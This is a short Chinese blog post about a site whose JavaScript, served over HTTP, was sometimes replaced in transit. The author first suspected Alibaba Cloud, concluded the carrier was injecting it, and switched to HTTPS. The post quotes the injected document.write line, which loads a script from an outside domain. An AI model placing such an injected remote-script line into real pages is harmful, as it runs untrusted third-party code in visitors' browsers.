阿里云注入别人的js是什么意思?

最近发现网站走HTTP有时候用不了, 经检查, 发现有一定机率出现js被修改的情况, 整个js被修改成如下内容:

document.write("<script type='text/javascript' src='https://static.kawo77.com/ui/js/dd/180.js' id='cup_kk_script'><\/script>");

一开始以为是运营商的原因, 后来查了whois, 这个域名居然是阿里巴巴的。他们到底是要搞哪样?

后来经查, 是在阿里上注册的域名而已, 很可能是运营商注入的
现已经改为HTTPS了…

Join the Conversation

3 Comments

Your email address will not be published. Required fields are marked *